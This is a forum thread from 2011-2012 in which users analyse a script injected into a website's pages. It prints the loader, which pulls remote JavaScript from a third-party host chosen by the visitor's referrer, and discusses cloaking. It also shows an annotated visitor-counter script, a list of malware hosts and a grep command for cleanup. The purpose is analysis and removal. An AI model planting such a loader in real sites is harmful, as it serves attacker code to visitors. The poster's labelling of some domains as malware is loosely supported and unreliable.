Is this malicious code?




Re: Is this malicious code?

Post by egami » Mon Nov 21, 2011 12:24 pm

The code itself isn't really malicious; what matters is what the code downloads — the remote script it injects into the page — and that might be.


Re: Is this malicious code?

Post by egami » Mon Nov 21, 2011 12:28 pm

OK, so it's fairly straightforward.

This script loads a second script, and picks which URL to load based on whether the visitor arrived with a referrer:


<script type="text/javascript">
// Injected loader found in the site's pages. It pulls a script from
// 4llw4d.freefilesblog.com (a third-party host, not the site's own copy of
// jQuery) over plain http:, and chooses the file by the visitor's referrer:
//   - no referrer (direct visit, bookmark, or a client that sends none)
//     -> jquery.min.js
//   - any referrer (e.g. arriving from a search engine or another site)
//     -> jquery.js
// document.write() executes whatever that host returns with the full
// privileges of the page, so the remote host — not this snippet — decides
// what actually runs. The '</scr'+'ipt>' split keeps the literal closing tag
// out of the string so the HTML parser does not end the script block early.
if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://4llw4d.freefilesblog.com/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://4llw4d.freefilesblog.com/jquery.js"></scr'+'ipt>'); }
</script>
The file http://4llw4d.freefilesblog.com/jquery.js comes back empty when fetched directly. That is more likely deliberate than an .htaccess misconfiguration: serving an empty file to anyone who requests it without a browser-like User-Agent and Referer (cloaking) is a common way for a malicious host to hide its payload from analysts and scanners while real visitors, who arrive with a referrer, get the actual script.

I would be cautious of it, to be frank.


Re: Is this malicious code?

Post by TheProdigyGuy » Thu Jan 19, 2012 2:15 pm

IMHO it is suspicious. Even if this is a legitimate site that has been hacked and those .js files have been swapped out, whoever controls that host can use this to infect your site's visitors: exploit 0-day vulnerabilities in Flash Player and Java plugins, redirect to malware domains, phish, DDoS other sites using your real visitors' UA and IP (which has advantages for them), and finally build a botnet out of your site's visitors.

Served when there is no referrer (the quoted snippet is cut off by the forum after "docum"):
<span style="display:none"><script id="_wau02f">var _wau = _wau || []; _wau.push(["small", "oyh4xtc1j9zo", "02f"]);(function() { var s=document.createElement("script"); s.async=true; s.src="http://widgets.amung.us/small.js";docum ... );</script>
</span>







============================================================
=====================================================================================

cmd> GET /small.js HTTP/1.0
cmd> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd> User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)
cmd> Host: widgets.amung.us
cmd>
hdr> HTTP/1.1 200 OK
hdr> Date: Thu, 19 Jan 2012 22:26:34 GMT
hdr> Content-Type: application/x-javascript
hdr> Content-Length: 4212
hdr> Last-Modified: Wed, 18 Jan 2012 06:52:38 GMT
hdr> Connection: close
hdr> Server: Apache/1.1 (Windows 4.00.950)
hdr> Expires: Sat, 18 Feb 2012 22:26:34 GMT
hdr> Cache-Control: max-age=2592000
hdr> Accept-Ranges: bytes
RequestDone Error = 0
StatusCode = 200

=====================================================================================

+===> widgets.amung.us — flagged by the poster as a malware domain; the script it serves is a visitor counter (whos.amung.us) that reports the page title and full referrer to whos.amung.us, and injects that request as a <script> rather than an image beacon.
==> http://cdn.tynt.com/tc.js — described by the poster as a well-known malware domain; the counter script loads it (over plain http, with no integrity check) on every http: page.

<img src="data:image/gif;base64,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"></img>
It also counts how many users are "online" (the count is rendered by the code below):


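// whos.amung.us "small" visitor-counter widget (reformatted from the minified
// small.js served by widgets.amung.us). The page-side snippet pushes
// [type, key, idSuffix] entries (e.g. ["small", "<key>", "02f"]) into the
// global `_wau` queue; this script drains that queue once <body> exists.
//
// Security notes for reviewers:
//  - WAU_small() sends the page title and the full document.referrer to
//    whos.amung.us, and injects that request as a <script>, so the third
//    party gets to run code in the page, not just receive a beacon.
//  - Both injected scripts are fetched over plain http: with no integrity
//    check, so anyone on the network path can substitute them.
//  - The original built the glyph table with eval() on a string literal; it is
//    now a plain object literal with the same keys and values, which also lets
//    the widget run under a CSP that forbids 'unsafe-eval'.

// Tynt's command queue; shared with cdn.tynt.com/tc.js when that is loaded.
var Tynt = Tynt || [];

// Sprite-sheet offsets for the count glyphs: key -> [x, y, width, height] in
// px. 'o' is the wide trailing glyph appended after the digits (presumably an
// "online" label). Formerly `eval("({'0':[0,-15,5,8], ...})")`.
var WAU_SMALL_META = Object.freeze({
  "0": [0, -15, 5, 8],
  "1": [-5, -15, 3, 8],
  "2": [-8, -15, 5, 8],
  "3": [-13, -15, 5, 8],
  "4": [-18, -15, 5, 8],
  "5": [-23, -15, 5, 8],
  "6": [-28, -15, 5, 8],
  "7": [-33, -15, 5, 8],
  "8": [-38, -15, 5, 8],
  "9": [-43, -15, 5, 8],
  ",": [-48, -15, 2, 8],
  "o": [-50, -15, 24, 8]
});

// Bootstrap: if the page-side snippet already created `_wau`, (re)schedule the
// queue drain. clearTimeout() first, presumably so that loading this script a
// second time does not schedule two drains.
if (typeof _wau !== "undefined") {
  var WAU_ren = WAU_ren || []; // per-entry "already rendered" flags
  clearTimeout(window.WAU_f_init);
  window.WAU_f_init = setTimeout(WAU_pl, 300);
}

// Fire the "ping" beacon for widget key `b` and, on plain-http pages, also
// load Tynt's tc.js. `d` is the index of the `_wau` entry being rendered
// (-1 when omitted). Returns nothing; the side effects are one or two
// <script> insertions placed before the first <script> element of the page.
function WAU_small(b, d) {
  if (typeof d === "undefined") { var d = -1; }
  // Page title: first 80 chars, with "?=" and "/" removed, URL-encoded.
  var a = "";
  if (document.title) {
    a = encodeURIComponent(document.title.substr(0, 80).replace(/(\?=)|(\/)/g, ""));
  }
  // Anchor element: the first <script> on the page.
  var c = document.getElementsByTagName("script")[0];
  (function () {
    // The full referrer URL goes along (y=), plus a random cache-buster (r=).
    var f = encodeURIComponent(document.referrer);
    var e = document.createElement("script");
    e.async = "async";
    e.type = "text/javascript";
    e.src = "http://whos.amung.us/pingjs/?k=" + b + "&t=" + a + "&c=s&y=" + f + "&a=" + d + "&r=" + Math.ceil(Math.random() * 999999);
    c.parentNode.insertBefore(e, c);
  })();
  // Tynt is only loaded on http: pages; it is fetched over http: itself, so
  // presumably this avoids mixed content on https: pages.
  if (document.location.protocol == "http:") {
    Tynt.push("w!" + b);
    (function () {
      var e = document.createElement("script");
      e.async = "async";
      e.type = "text/javascript";
      e.src = "http://cdn.tynt.com/tc.js";
      c.parentNode.insertBefore(e, c);
    })();
  }
}

// Render the visitor count `c` (a string of digits, possibly with commas) as a
// row of sprite glyphs and insert the widget into the page. `key` is the
// widget key used for the stats link; `async_index` is the `_wau` entry index
// (-1 = legacy synchronous include, placed after the small.js <script> tag).
// The caller of this function is not in this listing. Characters that are not
// in WAU_SMALL_META make the onload handler throw (unchanged from the
// original).
function WAU_r_s(c, key, async_index) {
  if (typeof async_index === "undefined") { var async_index = -1; }
  // Sprite sheet inlined as a data: URI; old IE gets a plain http: image
  // instead (presumably because it cannot use data: URIs as backgrounds).
  var raw_im_data = "data:image/gif;base64,R0lGODlhUAAXAMQAAM1iTdBuWMQ4MsdHOt+ch/js5+/Qw+vCs/Pe1dR6Y+OolNuQespVQ9eFbsAnLX9/fzAwL////zU1NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAABQABcAAAX/ICSOZGmeaKqu7Bi9L3IcBWzfeK7vfI+LMAPAQXQEEBGJcslsOp/QqFQaAUYMAiIjMnAIDMmpeEweVyGRQtcxIByy7Fd5Ti+fIwTiABYoKsJ1gYJMd30OeIhDRoCDjXR3igAEEQAChgCMjppihUULL3CLm6OcQHlEEQ0JEX6ZpK9Ld2qofZRxrrCvd1dZrA4AlWC5w7FWEQgJRQ4JSMTOuzAFMzU+1dbX1i3a29zdJhIwSkk24OGAOOU56eJyYw8S73ax7bGE54y45fP1YvFzYXIy4btH6Mm4feKYPIi3kCE8eAuXRHRy8OA6duzQkUuYMSMghyAfhnzYpF1FKPjsNPEDyI8jyXchYSqB2ZBiPYs2W+rjyNIlOIkzX4oU6s9gwB4lN4ZzaW5pmIkxhUIs6uzRsBAAOw==";
  var meta = WAU_SMALL_META; // glyph table, no longer built via eval()
  if (WAU_legacy_b()) {
    raw_im_data = "http://widgets.amung.us/widtemplates/smalloutline.gif";
  }
  // Append the trailing 'o' glyph, then split into one character per cell.
  c += "o";
  c = c.split("");
  // Preload the sprite; the widget is only built and inserted once the image
  // has loaded, so a blocked image means no widget at all.
  var img = document.createElement("img");
  img.onload = function () {
    var wid = document.createElement("div");
    wid.style.position = "relative";
    wid.style.display = "inline-block";
    wid.style.backgroundImage = "url(" + raw_im_data + ")";
    wid.style.width = "80px";
    wid.style.height = "15px";
    wid.style.padding = "0";
    wid.style.margin = "0";
    wid.style.overflow = "hidden";
    wid.style.cursor = "pointer";
    wid.title = "Click to see stats for this site by whos.amung.us (" + key + ")";
    // Left offset shrinks for counts of 7+ characters (presumably to keep the
    // row inside the 80px widget; a leading "1" is the narrowest glyph).
    var x_pos = 20;
    if (c.length > 6 && c[0] != "1") {
      x_pos = 16;
    } else {
      if (c.length > 6 && c[0] == "1") { x_pos = 17; }
    }
    for (var i = 0; i < c.length; i++) {
      var char_meta = meta[c[i]];
      var character = document.createElement("div");
      character.style.backgroundImage = "url(" + raw_im_data + ")";
      character.style.backgroundRepeat = "no-repeat";
      character.style.backgroundAttachment = "scroll";
      character.style.backgroundPosition = char_meta[0] + "px " + char_meta[1] + "px";
      character.style.position = "absolute";
      character.style.width = char_meta[2] + "px";
      character.style.height = char_meta[3] + "px";
      character.style.top = "4px";
      character.style.left = x_pos + "px";
      character.style.lineHeight = char_meta[3] + "px";
      character.style.overflow = "hidden";
      character.style.padding = "0";
      character.style.margin = "0";
      wid.appendChild(character);
      x_pos += char_meta[2] + 1; // 1px gap between glyphs
    }
    // Clicking the widget navigates away to the public stats page for `key`.
    wid.onclick = function () { window.location = "http://whos.amung.us/stats/" + key + "/"; };
    if (async_index >= 0) {
      // Async include: place the widget right after the snippet's <script id="_wau<suffix>">.
      var scr = document.getElementById("_wau" + _wau[async_index][2]);
      scr.parentNode.insertBefore(wid, scr.nextSibling);
    } else {
      WAU_insert(wid, "amung.us/small.js");
    }
  };
  img.src = raw_im_data;
}

// Insert node `c` after every <script> whose src contains `d` at a position
// greater than 0 (a src that starts with `d` is skipped — preserved from the
// original). Returns nothing.
function WAU_insert(c, d) {
  var a = document.getElementsByTagName("script");
  for (var b = 0; b < a.length; b++) {
    if (a[b].src.indexOf(d) > 0) {
      a[b].parentNode.insertBefore(c, a[b].nextSibling);
    }
  }
}

// True for Internet Explorer versions below 8, judged from navigator.appVersion.
function WAU_legacy_b() {
  if (navigator.appVersion.indexOf("MSIE") != -1 && parseFloat(navigator.appVersion.split("MSIE")[1]) < 8) {
    return true;
  }
  return false;
}

// Poll every 500ms until document.body exists, then drain the `_wau` queue.
function WAU_pl() {
  document.body ? WAU_la() : setTimeout(WAU_pl, 500);
}

// Drain the `_wau` queue: each not-yet-rendered entry is dispatched to the
// global function named "WAU_" + entry[0], if one exists. "map" entries pass
// four extra arguments to WAU_map (not defined in this listing); others pass
// entry[1] (the key), entry[3] when present, and the entry index.
function WAU_la() {
  for (var a = 0; a < _wau.length; a++) {
    if (typeof WAU_ren[a] === "undefined" || WAU_ren[a] == false) {
      WAU_ren[a] = true;
      if (typeof window["WAU_" + _wau[a][0]] === "function") {
        if (_wau[a][0] == "map") {
          window.WAU_map(_wau[a][1], _wau[a][3], _wau[a][4], _wau[a][5], _wau[a][6], a);
        } else {
          if (typeof _wau[a][3] !== "undefined") {
            window["WAU_" + _wau[a][0]](_wau[a][1], _wau[a][3], a);
          } else {
            window["WAU_" + _wau[a][0]](_wau[a][1], a);
          }
        }
      }
    }
  }
}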





The site naruto-spoilers.com is pulling in malware from hosts around the world: the chain starts in the USA, moves to Europe (Germany/Austria) and ends in China.

Google Tag:
List of Naruto: Shippuden episodes. Naruto is an anime series based on the manga series of the same.

The cyber criminals are using the AS21844 network to dish out the infection. If one malware site is taken down, a new one takes its place immediately.

The variants found range from trojan downloaders all the way up to fake-AV infections.

The Journey starts at naruto-spoilers.com IP 74.220.207.145:

Malware found on IP 74.220.207.145:
PHP/Pbot.A
PHP/Agent.DZ
PHP/BackDoor.AR

naruto-spoilers.com is hosted on a network flagged as malicious:

AS11798 /Bluehost Inc.
Malware Found on AS11798
Trojan Zbot
FakeAV
Exploits

The traffic then goes to widgets.amung.us (IP 173.192.225.170) via 174.123.133.231. These hosts sit on AS21844, a network that is flagged as malicious.

Network Info:

Network Name The Planet Internet Services
Primary ASN 21844
Website hxxp://www.theplanet.com
Then on to katzu.info (IP 174.123.133.233).




A quick way to locate every file on the server that carries the injected loader is to search for the domain (it is unique to the injection, whereas "<script" matches every legitimate tag):
grep -r '4llw4d.freefilesblog.com' * |less
Removing the loader alone is not enough, though: if a PHP backdoor like the ones reported on the same IP above is still on the server, the injection will simply come back.

